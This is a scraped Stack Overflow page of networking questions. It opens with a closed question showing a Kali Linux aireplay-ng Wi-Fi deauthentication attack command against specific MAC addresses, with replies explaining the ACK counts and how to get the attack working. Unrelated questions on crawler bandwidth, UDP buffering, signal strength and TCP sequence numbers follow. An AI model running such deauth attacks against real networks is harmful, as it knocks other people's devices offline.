Closed. This question is not about programming or software development. It is not currently accepting answers.
This question does not appear to be about a specific programming problem, a software algorithm, or software tools primarily used by programmers. If you believe the question would be on-topic on another Stack Exchange site, you can leave a comment to explain where the question may be able to be answered.
Closed 10 days ago.
Improve this question
I have tring to "Deauth" Attack in my Kali Linux, but is do not send any ACK
root#kali:~# aireplay-ng --deauth 200 -a 6A:15:90:F4:4D:82 -c F8:F1:B6:E8:E6:2A --ignore-negative-one wlan0mon
12:26:31 Waiting for beacon frame (BSSID: 6A:15:90:F4:4D:82) on channel 9
12:26:32 Sending 64 directed DeAuth. STMAC: [F8:F1:B6:E8:E6:2A] [ 0| 0 ACKs]
12:26:32 Sending 64 directed DeAuth. STMAC: [F8:F1:B6:E8:E6:2A] [ 0| 0 ACKs]
12:26:41 Sending 64 directed DeAuth. STMAC: [F8:F1:B6:E8:E6:2A] [ 0| 0 ACKs]
12:26:42 Sending 64 directed DeAuth. STMAC: [F8:F1:B6:E8:E6:2A] [ 0| 0 ACKs]
12:26:52 Sending 64 directed DeAuth. STMAC: [F8:F1:B6:E8:E6:2A] [ 0| 0 ACKs]
12:26:52 Sending 64 directed DeAuth. STMAC: [F8:F1:B6:E8:E6:2A] [ 0| 0 ACKs]
12:27:02 Sending 64 directed DeAuth. STMAC: [F8:F1:B6:E8:E6:2A] [ 0| 0 ACKs]
12:27:03 Sending 64 directed DeAuth. STMAC: [F8:F1:B6:E8:E6:2A] [ 0| 0 ACKs]
12:27:13 Sending 64 directed DeAuth. STMAC: [F8:F1:B6:E8:E6:2A] [ 0| 0 ACKs]
12:27:13 Sending 64 directed DeAuth. STMAC: [F8:F1:B6:E8:E6:2A] [ 0| 0 ACKs]
How can I use this attack?
Thanks
So what is the meaning of [28|63 ACKs]??
It means:
[ ACKs received from the client | ACKs received from the AP ]
in this case 28 ACKs received from the client and 63 ACKs received from AP
But in your case A zero value definitely tells the client and/or AP did not hear your packets.
It may possible that no one(client) is connected with your target AP.
I know this is old, but just remove "-c " and you should be fine
Related
I have implemented a webcrawler with libcurl and libev. My intention was to make a high performance crawler that uses all available bandwidth. I have succeeded in making a crawler that can sustain over 10,000 parallel connections. However, the stats for bandwidth usage are not all that impressive. Here is some example output from vnstat:
rx | tx
--------------------------------------+------------------
bytes 32.86 GiB | 3.12 GiB
--------------------------------------+------------------
max 747.99 Mbit/s | 25.73 Mbit/s
average 15.69 Mbit/s | 1.49 Mbit/s
min 2.62 kbit/s | 12.29 kbit/s
--------------------------------------+------------------
packets 33015363 | 23137442
--------------------------------------+------------------
max 68804 p/s | 28998 p/s
average 1834 p/s | 1285 p/s
min 5 p/s | 5 p/s
--------------------------------------+------------------
time 299.95 minutes
As you can see my average download speed is only 15.69 Mbps while the network bandwidth can support much more. I do not understand why the application is downloading so slowly and yet still maintaining over 10K connections in parallel. Is this something to do with the URLs that are being downloaded? If I repeatedly download www.google.com, www.yahoo.com and www.bing.com I can achieve speeds of up to 7 Gbps. With general crawling though the speed is as shown above.
Any thoughts or ideas?
Closed. This question needs debugging details. It is not currently accepting answers.
Edit the question to include desired behavior, a specific problem or error, and the shortest code necessary to reproduce the problem. This will help others answer the question.
Closed 4 years ago.
Improve this question
I have a udp client (I have no control over the source code) that is constantly sending data frames, one frame per 500ms, and I have a udp server that checks the last frame every 5 seconds.
The problem is that this udp server doesn't read the last frame but only the next frame in the udp buffer from the operating system.
n = recvfrom(server_sockfd, buf, BUFSIZE, 0, (struct sockaddr *) &new_dax[eqpID].clientaddr,
&new_dax[eqpID].clientlen);
With this code if my udpclient is sending :
FRAME 1 ->500ms
FRAME 2->500ms
FRAME 3->500ms
FRAME X->500ms
My udp server receives firstly FRAME 1, and then after 5 seconds when I try to read the frame from the client the server receveives FRAME 2 instead of FRAME X.
How do I get the last frame received? I tried closing the server socket and opening it again when I want to receive the last frame but this is consuming to much resources. Is it possible without closing the server socket?
Thanks!
You can use recvmmsg() to receive a whole bunch of messages at once. So in your case, you expect to receive about 10 messages per read, so set up buffers for 12-15 messages and just call recvmmsg() once, then ignore all but the last message.
You'll want to use the MSG_WAITFORONE flag, so that recvmmsg() doesn't block until all 12-15 messages are received--you only expect to receive 9-11 or so.
I am using OCB mode based on ath9k driver for my wireless connections between different nodes. I need to know the signal strength of received packets in my user-space application to do some calculation based on that. In order to communicate I am using socket APIs and udp packets.
So, here is the question: Is there any function or API in C to get signal strength of a received packet in a user-space application?
I don't know if the signal strengh "of a received packet" really makes sense, but you can get some information on the wifi signal where you are connected by reading /proc/net/wireless
$ cat /proc/net/wireless
Inter-| sta-| Quality | Discarded packets | Missed | WE
face | tus | link level noise | nwid crypt frag retry misc | beacon | 22
wlan0: 0000 69. -41. -256 0 0 0 1 274 0
Generally speaking, /proc provides runtime information about your system. Technically speaking, if you wish to read this from a C program you should probably try to find if there is an API for this, otherwise read/open/close the file and parse its content. See this thread for details about reading the /proc filesystem.
You should use cfg80211, see http://www.linuxwireless.org/en/developers/Documentation/cfg80211/
I have a server and a client. The are working in different servers. Both of the servers have two 1000M network adapters.
I am using tcp blocking socket both in server and client.
Server
Once a socket is accepted, a new thread will be started to process the request. It works like:
while(1) {
recv(); /* receive a char */
send(); /* send a line */
}
The client just send a char to the server, server will send a line of text to the client. The length of the text is about 200.
The line has beed loaded into memory in advance.
Client
The client use different threads to connect to the server. Once connected, It will work like:
while(1) {
send(); /* send a char */
recv(); /* receive a line and */
}
Bandwidth usage
When I use 100 threads in client(and more the result is almost the same), I get this network traffic in Server:
tsar -l -i 1 --traffic
the result:
Time -------------traffic------------
Time bytin bytout pktin pktout
06/09/14-23:12:56 0.00 0.00 0.00 0.00
06/09/14-23:12:57 63.4M 155.3M 954.6K 954.6K
06/09/14-23:12:58 0.00 0.00 0.00 0.00
06/09/14-23:12:59 60.1M 147.3M 905.4K 905.4K
06/09/14-23:13:00 0.00 0.00 0.00 0.00
06/09/14-23:13:01 57.5M 140.8M 866.5K 866.4K
and sar -n DEV 1:
11:20:46 PM IFACE rxpck/s txpck/s rxkB/s txkB/s rxcmp/s txcmp/s rxmcst/s
11:20:47 PM lo 0.00 0.00 0.00 0.00 0.00 0.00 0.00
11:20:47 PM eth0 478215.05 478217.20 31756.46 77744.95 0.00 0.00 0.00
11:20:47 PM eth1 484318.28 484318.28 32162.05 78724.16 0.00 0.00 1.08
11:20:47 PM bond0 962533.33 962535.48 63918.51 156469.11 0.00 0.00 1.08
Question:
In theory, the max value of (bytin + bytout) could be 256M. How can I archive that?
Any help will be great, thank in advance.
In practice there are some overhead in several layers. 1Gbits/sec ethernet does not mean that much on the application side (but I guess at most 90% of that). A rule of thumb is to send or recv quite large data sizes (e.g. several kilobytes at least). Sending or recieving a few hundred bytes is inefficient. And the question is surely OS specific (I am thinking of Linux).
Recall that by definition TCP is not a transmission of packets, but of a stream of bytes. Read TCP wikipage. You should avoid send-ing or recv-ing a few bytes, or even a hundred of them. Try to send thousands of bytes at each time. Of course, a single recv on the recieving side is not (in general) corresponding to a single send on the emitter side and vice versa (especially if you have some routers between sending and recieving computers; routers can split or coalesce network packets, so you can't be sure to have one recv on the receptor per each send in the emitter).
Gigabit Ethernet wants Jumbo Frames of nearly 9000 bytes. You probably want your data buffer for send to be a little below that (because of the various overhead for IP and TCP), so try 8Kbytes.
The send(2) man page mentions MSG_MORE flag for tcp(7). You could use it with care. See also this.
Also syscalls(2) have some overhead. I'm surprised you are able to make a million of them each second. That overhead is another reason for buffering both outgoing and incoming data in significant pieces (of e.g. 8192, 16384, or 32768 bytes each; you need to benchmark to find the best one). And I won't be surprised if the kernel prefers page-aligned data. So perhaps try to have your buffer aligned to 4096 bytes (e.g. using mmap(2) or posix_memalign(3)...)
If you care about performance, don't use send(2) with a small byte count. At least change your application to send more than a few kilobytes (e.g. 4Kbytes) at each send syscall. And for recv(2), pass a buffer of at least 4kilobytes. So sending or recv a single byte or a line of a hundred bytes is inefficient. Your application should buffer such data (and perhaps split data into "application messages"...). There are some libraries doing that (like 0MQ...), or at least terminate each message with a delimiter (newline perhaps), which would ease the splitting of a received buffer into several incoming application messages.
My feeling is that your application is inefficient and buggy (probably would work badly on other networks, e.g. if there are some routers between both computers). You need to redesign and recode some parts of your application! You need to buffer, and you need to manage application messages - splitting and joining them ....
Yous should test your application on several networks, in particular thru ADSL and wifi and if possible long-distance networking (you'll then observe that send and recv do not "match").
According to my math, you are relatively close to saturating the link.
As I understand it, this is one second of traffic.
Time -------------traffic------------
Time bytin bytout pktin pktout
06/09/14-23:12:57 63.4M 155.3M 954.6K 954.6K
A TCP packet sent over Ethernet has 82 bytes of overhead (42 ethernet, 20 IP, 20 TCP), so the amount of data received is (954.6k * 80 + 63.4M)*8 bits, which totals 1.1G.
I would assume that with such a large number of packets, there would be additional overhead involved with negotiation of the physical medium. Since the links have about 50% utilization, if there's an additional delay as small as (1s / 954.6k) * 50% = 500 ns (one half microsecond!) then you've accounted for the additional delay. 500 ns is the amount of time it takes for light to travel 150 meters, which isn't that far.
I'm writing a C/C++ client-server program under Linux. Assume a message m is to be sent from the client to the server.
Is it possible for the client to read the TCP sequence number of the packet which will carry m, before sending m?
In fact, I'd like to append this sequence number to m, and send the resulting packet. (Well, things are more complicated, but let's keep it that simple. In fact, I'd like to apply authentication info to this sequence number, and then append it to m.)
Moreover,
is it possible for the server to read the TCP sequence number of the packet carrying m?
You can do something very nearly equivalent to this. You can count all the bytes you send and put a count of all the bytes sent before the message at the end of your message.
I get really nervous anytime anybody talks about 'packets' with TCP. Because if you talk about packets and TCP at the same time you are mixing protocol levels that shouldn't be mixed. There is no meaningful correspondence between data you send in TCP and the packets that are sent via IP.
Yes, there are sequence numbers in IP packets used to send TCP information. These sequence numbers are a count of the number of bytes (aka octets) sent so far. They identify where in the stream the bytes in the packet belong, but they are otherwise unrelated to the packet.
If a resend happens, or if you're using the Nagle algorithm, or if the TCP stack feels like it that day, you may end up with two send operations ending up in the same packet. Or, you might end up with half of one send operation ending up in one packet, and half in another packet. And each of those packets will have their own sequence numbers.
As I said, there is absolutely no meaningful relationship between send operations you perform at the transport layer and the packets sent at the network layer. I'm not talking theoretically either. It's not 'really all packets underneath and the send generally, barring some weird condition, puts all the bytes in a single packet'. No, the scenarios I outlined above where the bytes from a single send operation are spread to multiple packets happen frequently and under unpredictable conditions.
So, I don't know why you want to know anything about the sequence numbers in packets. But if you were using the sequence number as a proxy for number of bytes sent, you can keep that count yourself and just stuff it into the stream yourself. And remember to count those bytes too.
no, you can't do that -- at least not with expected result
This is because:
TCP is stream based, not packet based.
TCP sequence number is in byte, not packet.
Underlying TCP layer do the segmentation for you.
TCP window size / packet size are dynamic
These means you might send a "packet" with the sequence number at the end of "packet". It turns out, the underlying magics re-segment your packet.
What you want:
1 2 3 4
+---+---+---+---+
| A | B | C |"1"| packet 1, seq=1, len=4
+---+---+---+---+
5 6 7 8
+---+---+---+---+
| A | B | C |"5"| packet 2, seq=5, len=4
+---+---+---+---+
What you might get:
1 2 3 4
+---+---+---+---+
| A | B | C |"1"| packet 1 (seq=1, len=4)
+---+---+---+---+
(packet 1 got lost)
1 2 3 4 5 6
+---+---+---+---+---+---+
| A | B | C |"1"| A | B | packet 1, resent, seq=1, len=6
+---+---+---+---+---+---+
7 8
+---+---+
| C |"5"| packet 2, seq=7, len=2
+---+---+
TCP/IP stack does all the things for you. You receive only payload. Stack removes all the headers and provides payload at user space.
If you really want to add or modify at packet header level, try out RAW sockets. RAW sockets receives/sends packet directly from Network card irrespective of transport type (TCP or UDP). In this case you have to strip/add all the headers (TCP/UDP Header, IP Header and Ethernet Header) with your payload.
Checkout a very good video tutorial on RAW Sockets